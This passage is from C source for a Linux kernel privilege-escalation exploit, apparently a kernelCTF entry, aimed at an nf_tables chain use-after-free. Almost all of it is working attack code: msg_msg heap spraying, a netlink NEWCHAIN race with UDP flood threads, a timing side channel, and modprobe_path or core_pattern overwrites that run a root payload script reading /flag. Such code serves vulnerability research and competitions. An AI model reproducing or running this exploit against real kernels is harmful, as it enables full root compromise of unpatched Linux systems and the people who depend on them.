+ * ================================================================ */ +// @step(name="msg_msg Spray for nft_base_chain Reclaim") +static int spray_qids[NUM_SPRAY_QS]; +static uint64_t mtext_sz = 0; /* computed: 256 - MSG_MSG_SIZE */ + +static void spray_build_msg(char *msgbuf, uint64_t page_kva) { + long mtype = 1; + memcpy(msgbuf, &mtype, sizeof(long)); + char *mtext = msgbuf + sizeof(long); + memset(mtext, 0, mtext_sz); + + /* blob_gen_0 at alloc offset -> mtext offset = alloc_off - MSG_MSG_SIZE */ + memcpy(mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE), &page_kva, 8); + /* blob_gen_1 */ + memcpy(mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE), &page_kva, 8); + /* policy (NF_ACCEPT=1) */ + mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE] = 1; + /* flags (NFT_CHAIN_BASE bit 0) */ + mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE] = 0x01; +} + +static void spray_msgs(uint64_t page_kva) { + size_t bufsz = sizeof(long) + mtext_sz; + char *msgbuf = (char *)calloc(1, bufsz); + spray_build_msg(msgbuf, page_kva); + + int total = 0; + for (int i = 0; i < NUM_SPRAY_QS; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + if (spray_qids[i] < 0) die("msgget spray"); + for (int j = 0; j < MSGS_PER_Q; j++) { + long mt = j + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(spray_qids[i], msgbuf, mtext_sz, + IPC_NOWAIT) < 0) { + if (errno == EAGAIN) break; + die("msgsnd spray"); + } + total++; + } + } + free(msgbuf); + printf("[+] sprayed %d msg_msg into kmalloc-256\n", total); +} + +static void spray_free(void) { + size_t bufsz = sizeof(long) + mtext_sz; + char *tmp = (char *)malloc(bufsz); + for (int i = 0; i < NUM_SPRAY_QS; i++) { + for (int j = 0; j < MSGS_PER_Q; j++) + msgrcv(spray_qids[i], tmp, mtext_sz, 0, IPC_NOWAIT); + msgctl(spray_qids[i], IPC_RMID, nullptr); + } + free(tmp); +} + +/* ================================================================ + * UDP flood thread (CPU 1) + * 
================================================================ */ +// @step(name="Race: UDP Flood Thread") +static void *race_udp_flood_thread(void *unused) { + (void)unused; + cpu_pin(FLOOD_CPU); + + int s = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (s < 0) die("socket udp"); + struct sockaddr_in dst = {}; + dst.sin_family = AF_INET; + dst.sin_port = htons(UDP_PORT); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + #define FLOOD_BATCH 128 + char pkt[64]; + memset(pkt, 0x41, sizeof(pkt)); + + struct iovec iov[FLOOD_BATCH]; + struct mmsghdr msgs[FLOOD_BATCH]; + memset(msgs, 0, sizeof(msgs)); + for (int i = 0; i < FLOOD_BATCH; i++) { + iov[i].iov_base = pkt; + iov[i].iov_len = sizeof(pkt); + msgs[i].msg_hdr.msg_name = &dst; + msgs[i].msg_hdr.msg_namelen = sizeof(dst); + msgs[i].msg_hdr.msg_iov = &iov[i]; + msgs[i].msg_hdr.msg_iovlen = 1; + } + + unsigned long batch_count = 0; + while (race_running && !race_won) { + sendmmsg(s, msgs, FLOOD_BATCH, 0); + batch_count++; + /* Yield every Nth batch for RCU quiescent state on CPU 1 */ + if (batch_count % FLOOD_YIELD_INTERVAL == 0) + sched_yield(); + } + close(s); + return nullptr; +} + +/* ================================================================ + * Dedicated spray thread (CPU 0) -- reclaims freed chain slot + * ================================================================ */ +// @step(name="Race: Dedicated msg_msg Spray Thread") +#define DEDICATED_SPRAY_QS 512 +#define DEDICATED_SPRAY_BURST 8 + +static int dedicated_spray_qids[DEDICATED_SPRAY_QS]; + +static void *race_spray_thread(void *arg) { + uint64_t page_kva = (uint64_t)(uintptr_t)arg; + cpu_pin(RACE_CPU); + + size_t bufsz = sizeof(long) + mtext_sz; + char *msgbuf = (char *)calloc(1, bufsz); + spray_build_msg(msgbuf, page_kva); + char *rcvbuf = (char *)malloc(bufsz); + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + dedicated_spray_qids[q] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + + int qi = 0; + unsigned long iter = 0; + + while (race_running 
&& !race_won) { + /* The first alloc after kfree should take the freed slot; extra + * burst entries cover scheduler jitter before RCU quiescence. */ + for (int burst = 0; burst < DEDICATED_SPRAY_BURST; burst++) { + long mt = (long)((iter * DEDICATED_SPRAY_BURST + burst) % 256) + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(dedicated_spray_qids[qi], msgbuf, mtext_sz, + IPC_NOWAIT) < 0) { + qi = (qi + 1) % DEDICATED_SPRAY_QS; + break; + } + } + /* sched_yield: quiescent state for CPU 0, unblocks synchronize_rcu */ + sched_yield(); + iter++; + + if (iter % RACE_PROGRESS_INTERVAL == 0) { + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + while (msgrcv(dedicated_spray_qids[q], + rcvbuf, mtext_sz, + 0, IPC_NOWAIT) >= 0) + ; + qi = 0; + } + } + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + msgctl(dedicated_spray_qids[q], IPC_RMID, nullptr); + free(msgbuf); + free(rcvbuf); + return nullptr; +} + +/* ================================================================ + * INET chain creation loop (race trigger) + * ================================================================ */ +// @step(name="Race: INET NEWCHAIN Trigger Loop") +static int race_sock = -1; +static uint32_t race_seq = 0; + +static int race_nl_open(void) { + race_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (race_sock < 0) return -1; + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + if (bind(race_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) { + /* Do not leak the socket when bind fails. */ + close(race_sock); + race_sock = -1; + return -1; + } + int bufsz = RACE_NL_BUFSZ; + setsockopt(race_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(race_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static void *race_inet_chain_thread(void *arg) { + (void)arg; + cpu_pin(RACE_CPU); + + if (race_nl_open() < 0) { + printf("[-] race_nl_open failed\n"); + return nullptr; + } + + char buf[4096]; + char drain[4096]; + unsigned long i = 0; + time_t t0 = time(nullptr); + uint32_t pid_val = 0; + socklen_t slen = sizeof(struct 
sockaddr_nl); + struct sockaddr_nl bound; + getsockname(race_sock, (struct sockaddr*)&bound, &slen); + pid_val = bound.nl_pid; + + while (race_running && !race_won) { + size_t off = 0; + + /* BATCH_BEGIN */ + { + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + off); + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++race_seq; + nlh->nlmsg_pid = pid_val; + nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(nlh->nlmsg_len); + } + + /* NEWCHAIN (INET) -- IPv4 succeeds, IPv6 fails (-E2BIG) */ + { + char cname[32]; + snprintf(cname, sizeof(cname), "r%lu", i % CHAIN_NAME_MOD); + + struct nlmsghdr *op = (struct nlmsghdr *)(buf + off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + op->nlmsg_seq = ++race_seq; + op->nlmsg_pid = pid_val; + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = NFPROTO_INET; + nfg->version = NFNETLINK_V0; + + size_t op_max = sizeof(buf) - off; + nlastr(op, op_max, NFTA_CHAIN_TABLE, "ti"); + nlastr(op, op_max, NFTA_CHAIN_NAME, cname); + struct nlattr *hk = nla_nest_s(op, op_max, NFTA_CHAIN_HOOK); + nla32(op, op_max, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nla32(op, op_max, NFTA_HOOK_PRIORITY, 0); + nla_nest_e(op, hk); + nla32(op, op_max, NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + } + + /* BATCH_END -- triggers abort path with synchronize_rcu() */ + { + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + off); + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++race_seq; + nlh->nlmsg_pid = pid_val; + nlh->nlmsg_len = 
NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(nlh->nlmsg_len); + } + + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + ssize_t sret = sendto(race_sock, buf, off, 0, + (struct sockaddr*)&sa, sizeof(sa)); + if (sret < 0) { + while (recv(race_sock, drain, sizeof(drain), MSG_DONTWAIT) > 0) + ; + continue; + } + + while (recv(race_sock, drain, sizeof(drain), MSG_DONTWAIT) > 0) + ; + + i++; + if (i == 1 || i % RACE_PROGRESS_INTERVAL == 0) { + time_t now = time(nullptr); + printf("[*] race: %lu chains (%lds)\n", i, now - t0); + } + } + + close(race_sock); + race_sock = -1; + return nullptr; +} + +/* ================================================================ + * Payload + trigger + * ================================================================ */ +// @step(name="Payload Setup and Flag Exfiltration") +static pid_t get_init_pid(void) { + FILE *f = fopen("/proc/self/status", "r"); + if (!f) return getpid(); + char line[256]; + pid_t pid = getpid(); + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "NSpid:", 6) == 0) { + if (sscanf(line + 6, " %d", &pid) == 1) + break; + } + } + fclose(f); + return pid; +} + +static void setup_payload(void) { + pid_t init_pid = get_init_pid(); + printf("[+] init-ns pid = %d\n", init_pid); + + { + int mne = open("/proc/sys/vm/memfd_noexec", O_RDONLY); + if (mne >= 0) { + char c = '?'; + if (read(mne, &c, 1) < 0) { /* ignore */ } + close(mne); + printf("[*] vm.memfd_noexec=%c\n", c); + } else { + printf("[*] vm.memfd_noexec: not present\n"); + } + } + + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", MFD_EXEC); + if (g_pw_fd < 0) { + printf("[*] memfd_create(MFD_EXEC) failed (errno=%d), trying without\n", errno); + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", 0); + } else { + printf("[+] memfd_create(MFD_EXEC) succeeded (fd=%d)\n", 
g_pw_fd); + } + g_result_fd = (int)syscall(SYS_memfd_create, "result", 0); + + if (g_pw_fd >= 0 && g_result_fd >= 0) { + char script[1024]; + snprintf(script, sizeof(script), + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "D=${0#/proc/}\n" + "D=${D%%%%/*}\n" + "echo \"[+] script PID=$D fd=%d\" > /dev/ttyS0\n" + "cat /dev/vdb > /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /flag >> /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "id >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n", + g_result_fd, g_result_fd, g_result_fd); + if (write(g_pw_fd, script, strlen(script)) < 0) { /* ignore */ } + fchmod(g_pw_fd, 0755); + + { + char test_path[64]; + snprintf(test_path, sizeof(test_path), + "/proc/self/fd/%d", g_pw_fd); + pid_t tp = fork(); + if (tp == 0) { + execl(test_path, test_path, nullptr); + fprintf(stderr, "[!] memfd exec FAILED: errno=%d (%s)\n", + errno, strerror(errno)); + _exit(errno); + } + if (tp > 0) { + int st; + waitpid(tp, &st, 0); + int ex = WIFEXITED(st) ? WEXITSTATUS(st) : -1; + if (ex == 0) + printf("[+] memfd exec test: OK\n"); + else + printf("[!] memfd exec test: exit=%d\n", ex); + } + } + + snprintf(g_modprobe_path, sizeof(g_modprobe_path), + "/proc/%d/fd/%d", init_pid, g_pw_fd); + printf("[+] memfd payload: %s\n", g_modprobe_path); + } else { + if (g_pw_fd >= 0) { + close(g_pw_fd); + g_pw_fd = -1; + } + if (g_result_fd >= 0) { + close(g_result_fd); + g_result_fd = -1; + } + printf("[!] 
memfd_create failed, using /tmp fallback\n"); + + int payload_fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (payload_fd >= 0) { + const char *str = + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "id > /tmp/result\n" + "cat /flag >> /tmp/result 2>/dev/null\n" + "cat /dev/vdb >> /tmp/result 2>/dev/null\n" + "chmod 777 /tmp/result\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n"; + if (write(payload_fd, str, strlen(str)) < 0) { /* ignore */ } + close(payload_fd); + } + } + + int dummy_fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (dummy_fd >= 0) { + if (write(dummy_fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(dummy_fd); + } +} + +static int core_pattern_overwrite_seen = 0; + +static int setup_try_core_dump(void) { + int cp = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (cp >= 0) { + char cpbuf[256]; + ssize_t clen = read(cp, cpbuf, sizeof(cpbuf)-1); + close(cp); + if (clen > 0) { + cpbuf[clen] = 0; + if (clen > 0 && cpbuf[clen-1] == '\n') + cpbuf[clen-1] = 0; + if (strstr(cpbuf, "if=/dev/vdb") != nullptr) { + if (!core_pattern_overwrite_seen) { + printf("[+] core_pattern OVERWRITTEN to: %s\n", cpbuf); + core_pattern_overwrite_seen = 1; + } + } else if (!core_pattern_overwrite_seen) { + static int cp_printed = 0; + if (!cp_printed) { + printf("[*] core_pattern current: %s\n", cpbuf); + cp_printed = 1; + } + } + } + } + + if (!core_pattern_overwrite_seen) + return 0; + + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + printf("[+] core dump limit set to unlimited\n"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + printf("[+] dumpable set to 1\n"); + } + + printf("[*] triggering core dump (SIGSEGV child)...\n"); + pid_t child = fork(); + if (child == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + 
struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + raise(SIGSEGV); + _exit(1); + } + if (child > 0) { + int status = 0; + waitpid(child, &status, 0); + printf("[*] core dump child: signal=%d\n", + WIFSIGNALED(status) ? WTERMSIG(status) : -1); + } + // @sleep(desc="wait for core dump handler (dd) to finish") + sleep_ms(CORE_DUMP_WAIT_MS); + + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + } + + printf("[*] core dump triggered -- dd output should be on ttyS0\n"); + + static int direct_tried = 0; + if (!direct_tried) { + direct_tried = 1; + int vdb = open("/dev/vdb", O_RDONLY); + if (vdb >= 0) { + char buf[4096]; + ssize_t n = read(vdb, buf, sizeof(buf)-1); + close(vdb); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== FLAG FROM /dev/vdb =====\n%s\n", buf); + return 1; + } + } else { + printf("[*] /dev/vdb not accessible from container (errno=%d)\n", + errno); + } + } + + /* + * In kernelCTF, the core_pattern helper writes the flag to the serial + * console. The exploit process cannot observe that stream, so once the + * overwrite is confirmed and a core dump is triggered, exit successfully. 
+ */ + return 1; +} + +static int modprobe_overwrite_seen = 0; + +static int setup_try_modprobe(void) { + int mp = open("/proc/sys/kernel/modprobe", O_RDONLY); + if (mp >= 0) { + char mpbuf[256]; + ssize_t mlen = read(mp, mpbuf, sizeof(mpbuf)-1); + close(mp); + if (mlen > 0) { + mpbuf[mlen] = 0; + if (mlen > 0 && mpbuf[mlen-1] == '\n') + mpbuf[mlen-1] = 0; + if (strcmp(mpbuf, "/sbin/modprobe") != 0) { + if (!modprobe_overwrite_seen) { + printf("[+] modprobe_path OVERWRITTEN to: %s\n", mpbuf); + modprobe_overwrite_seen = 1; + } + } + } + } + + if (!modprobe_overwrite_seen) + return 0; + + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + int md = open("/proc/sys/kernel/modules_disabled", O_RDONLY); + if (md >= 0) { + char c = '?'; + if (read(md, &c, 1) < 0) { /* ignore */ } + close(md); + printf("[*] modules_disabled=%c\n", c); + if (c == '1') + printf("[!] WARNING: modules_disabled=1!\n"); + } + if (g_pw_fd >= 0) { + off_t pos = lseek(g_pw_fd, 0, SEEK_CUR); + lseek(g_pw_fd, 0, SEEK_SET); + char sbuf[200]; + ssize_t sn = read(g_pw_fd, sbuf, sizeof(sbuf)-1); + if (sn > 0) { + sbuf[sn] = 0; + printf("[+] script memfd (fd=%d) valid, %zd bytes\n", + g_pw_fd, sn); + } else { + printf("[!] script memfd read FAILED\n"); + } + lseek(g_pw_fd, pos, SEEK_SET); + } + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + const char *msg = "[+] exploit: ttyS0 writable\n"; + if (write(tty, msg, strlen(msg)) < 0) { /* ignore */ } + close(tty); + printf("[+] /dev/ttyS0 accessible from exploit\n"); + } else { + printf("[!] /dev/ttyS0 NOT accessible (errno=%d)\n", errno); + } + } + + printf("[*] triggering modprobe (fork+exec dummy)...\n"); + pid_t child = fork(); + if (child == 0) { + execl("/tmp/dummy","/tmp/dummy",nullptr); + _exit(127); + } + if (child > 0) { + int status = 0; + waitpid(child, &status, 0); + printf("[*] modprobe trigger: child exit=%d\n", + WIFEXITED(status) ? 
WEXITSTATUS(status) : -1); + } + // @sleep(desc="wait for modprobe handler to execute") + sleep_ms(MODPROBE_WAIT_MS); + + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + if (write(tty, buf, n) < 0) { /* ignore */ } + if (write(tty, "\n", 1) < 0) { /* ignore */ } + close(tty); + } + return 1; + } + } else { + printf("[*] memfd result: empty (sz=%ld)\n", (long)sz); + } + } + + int result_file_fd = open("/tmp/result", O_RDONLY); + if (result_file_fd >= 0) { + char buf[4096]; + ssize_t n = read(result_file_fd, buf, sizeof(buf)-1); + close(result_file_fd); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + return 0; +} + +static int setup_try_trigger(void) { + if (use_core_pattern) + return setup_try_core_dump(); + return setup_try_modprobe(); +} + +/* ================================================================ + * Main exploit + * ================================================================ */ + +// @step(name="Auto-size Physmap Spray") +static void setup_auto_physmap_size(void) { + unsigned long phys_ram_mb = 0; + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + phys_ram_mb = kb / 1024; + int cap = (int)(phys_ram_mb * 3 / 4); + if (cap < 128) cap = 128; + if (cap < physmap_mb) physmap_mb = cap; + break; + } + } + fclose(f); +} + +// @step(name="Setup Userspace Blob (no-SMAP mode)") +static void setup_userblob(void) { + void *userblob_page = mmap((void*)USERBLOB_ADDR, 4096, + PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); + if (userblob_page == 
MAP_FAILED) + die("mmap userblob"); + rop_build_blob((uint8_t*)userblob_page, USERBLOB_ADDR); + const char *ub_str = use_core_pattern ? g_core_cmd : g_modprobe_path; + size_t path_len = strlen(ub_str) + 1; + memcpy((uint8_t*)userblob_page + PATH_OFFSET, ub_str, path_len); + printf("[+] userblob at %#lx (SMAP off)\n", + (unsigned long)USERBLOB_ADDR); +} + +static int race_run_cycle(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + rop_fill_physmap(); + + spray_msgs(kva); + + printf("[*] race cycle kva=%#lx dur=%ds\n", + (unsigned long)kva, dur); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_spray, nullptr, race_spray_thread, + (void*)(uintptr_t)kva); + pthread_create(&t_race, nullptr, race_inet_chain_thread, + (void*)(uintptr_t)kva); + + time_t start = time(nullptr); + while (time(nullptr) - start < dur && !race_won) { + // @sleep(desc="poll core_pattern every 2s during race") + sleep_ms(PARENT_POLL_MS); + if (setup_try_trigger()) { + race_won = 1; + break; + } + } + + race_running = 0; + pthread_join(t_flood, nullptr); + pthread_join(t_race, nullptr); + pthread_join(t_spray, nullptr); + + if (!race_won && setup_try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 1; + } + + spray_free(); + return 0; +} + +static int race_candidate_child(uint64_t kva, int dur) { + printf("[*] setting up fresh user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + return race_run_cycle(kva, dur) ? 
0 : 1; +} + +static int race_run_fresh_candidate(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + rop_fill_physmap(); + + pid_t child = fork(); + if (child < 0) die("fork candidate"); + if (child == 0) + _exit(race_candidate_child(kva, dur)); + + int polls = ((dur + WORKER_GRACE_SEC) * 1000 + + PARENT_POLL_MS - 1) / PARENT_POLL_MS; + for (int t = 0; t < polls; t++) { + sleep_ms(PARENT_POLL_MS); + + if (setup_try_trigger()) { + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + return 1; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + int exit_status = WIFEXITED(status) ? WEXITSTATUS(status) : -1; + int term_sig = WIFSIGNALED(status) ? WTERMSIG(status) : 0; + printf("[*] candidate child exited (status=%d sig=%d)\n", + exit_status, term_sig); + if (exit_status == 0 || setup_try_trigger()) + return 1; + /* Child is already reaped: skip kill() so a recycled PID is + * never signalled, but keep the final delayed check. */ + sleep_ms(POST_EXIT_POLL_MS); + return setup_try_trigger(); + } + } + + kill(child, SIGTERM); + sleep_ms(POST_EXIT_POLL_MS); + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + + return setup_try_trigger(); +} + +static uint64_t mix64_u64(uint64_t x) { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; +} + +static int select_timed_init_alias_offsets(uint64_t *offs, int max, + uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_score[INIT_ALIAS_CANDS]; + uint64_t best_time[INIT_ALIAS_CANDS]; + uint64_t best_key[INIT_ALIAS_CANDS]; + uint64_t best_off[INIT_ALIAS_CANDS]; + + if (max > INIT_ALIAS_CANDS) + max = INIT_ALIAS_CANDS; + for (int i = 0; i < max; i++) { + best_score[i] = 0; + best_time[i] = 0; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + int intel = prefetch_cpu_is_intel(); + cpu_set_t oldset; + int have_old = 0; + pin_prefetch_cpu(&oldset, &have_old); + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kbase + off_init_begin + off; + uint64_t t; + if (intel) + t = prefetch_measure_min(kva, INIT_TIMING_PROBES, 0); + else + t = 
prefetch_measure_tries(kva, INIT_TIMING_PROBES); + + uint64_t score = intel ? (~t) : t; + uint64_t key = mix64_u64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < max; i++) { + if (score < best_score[i]) + continue; + if (score == best_score[i] && key >= best_key[i]) + continue; + for (int j = max - 1; j > i; j--) { + best_score[j] = best_score[j - 1]; + best_time[j] = best_time[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_score[i] = score; + best_time[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + restore_prefetch_cpu(&oldset, have_old); + + int added = 0; + for (int i = 0; i < max; i++) { + if (best_off[i] == ~0ULL) + continue; + offs[added++] = best_off[i]; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d " + "(%s timing)\n", added, intel ? "low" : "high"); + for (int i = 0; i < added; i++) + printf("[*] rank %d: off=%#lx t=%lu\n", + i + 1, (unsigned long)best_off[i], + (unsigned long)best_time[i]); + } + return added; +#else + (void)offs; + (void)max; + (void)init_size; + return 0; +#endif +} + +static int try_init_alias_candidates(void) { + if (!kbase || off_init_end <= off_init_begin) + return 0; + + uint64_t init_size = off_init_end - off_init_begin; + uint64_t offsets[INIT_ALIAS_CANDS]; + int ncands = select_timed_init_alias_offsets(offsets, INIT_ALIAS_CANDS, + init_size); + uint64_t step = 0; + + if (ncands <= 0) { + ncands = INIT_ALIAS_CANDS; + step = (init_size / INIT_ALIAS_CANDS) & ~0xFFFULL; + if (step < 0x1000) + step = 0x1000; + for (int i = 0; i < ncands; i++) { + uint64_t off = (uint64_t)i * step; + if (off + off_init_begin >= off_init_end) + off = init_size - 0x1000; + offsets[i] = off; + } + } + + printf("[*] phase0: __init alias candidates=%d range=%#lx-%#lx " + "step=%#lx dur=%ds\n", + ncands, + (unsigned long)(kbase + off_init_begin), + (unsigned long)(kbase + off_init_end), + (unsigned long)step, INIT_ALIAS_SEC); + + for (int i = 0; i < 
ncands; i++) { + uint64_t off = offsets[i]; + uint64_t kva = kbase + off_init_begin + off; + printf("[*] phase0 cand %d/%d: kva=%#lx (__init+%#lx)\n", + i + 1, ncands, (unsigned long)kva, + (unsigned long)off); + if (race_run_fresh_candidate(kva, INIT_ALIAS_SEC)) + return 1; + } + + return 0; +} + +/* + * The kernelCTF vuln-verify job runs `/exp --vuln-trigger` under KASAN, + * nokaslr, and a 3 minute outer timeout. Do not run the full LPE here: it + * can take longer than the verifier budget and makes patched kernels time out. + * + * This path only drives the vulnerable packet-path condition. It does not + * reclaim the freed chain, so KASAN sees the nft_do_chain() UAF directly on + * vulnerable kernels. Patched kernels should finish without a KASAN report. + */ +static int vuln_trigger_main(void) { + printf("[*] vuln-trigger: packet-path UAF reachability only\n"); + printf("[*] vuln-trigger: setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] vuln-trigger: failed to saturate hooks\n"); + return 1; + } + printf("[*] vuln-trigger: racing INET NEWCHAIN for %ds " + "(%d floods, KASAN no-reclaim)\n", + VULN_TRIGGER_SECONDS, VULN_TRIGGER_FLOODS); + + race_running = 1; + race_won = 0; + + pthread_t t_flood[VULN_TRIGGER_FLOODS]; + pthread_t t_race; + for (long i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_create(&t_flood[i], nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_race, nullptr, race_inet_chain_thread, nullptr); + + time_t start = time(nullptr); + int last_log = -1; + while (time(nullptr) - start < VULN_TRIGGER_SECONDS) { + sleep_ms(1000); + int elapsed = (int)(time(nullptr) - start); + if (elapsed / VULN_TRIGGER_LOG_EVERY != last_log) { + last_log = elapsed / VULN_TRIGGER_LOG_EVERY; + printf("[*] vuln-trigger: %ds elapsed\n", elapsed); + } + } + + race_running = 0; + for (int i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_join(t_flood[i], nullptr); + 
pthread_join(t_race, nullptr); + + printf("[-] vuln-trigger: no KASAN report observed\n"); + return 1; +} + +// @step(name="Exploit Orchestrator") +static int exploit_main(void) { + if (use_userblob) { + printf("[*] userblob mode (no physmap needed)\n"); + setup_userblob(); + } else { + printf("[*] physmap spray (%d MB)\n", physmap_mb); + spray_physmap(); + } + + int have_pagemap = 0; + if (use_userblob) { + g_page_kva = USERBLOB_ADDR; + have_pagemap = 1; + } else { + g_page_kva = leak_physmap_kva(); + if (g_page_kva) { + have_pagemap = 1; + printf("[+] page_kva=%#lx (from pagemap)\n", + (unsigned long)g_page_kva); + } else { + printf("[!] pagemap unavailable\n"); + } + } + + if (have_pagemap) { + printf("[*] setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate 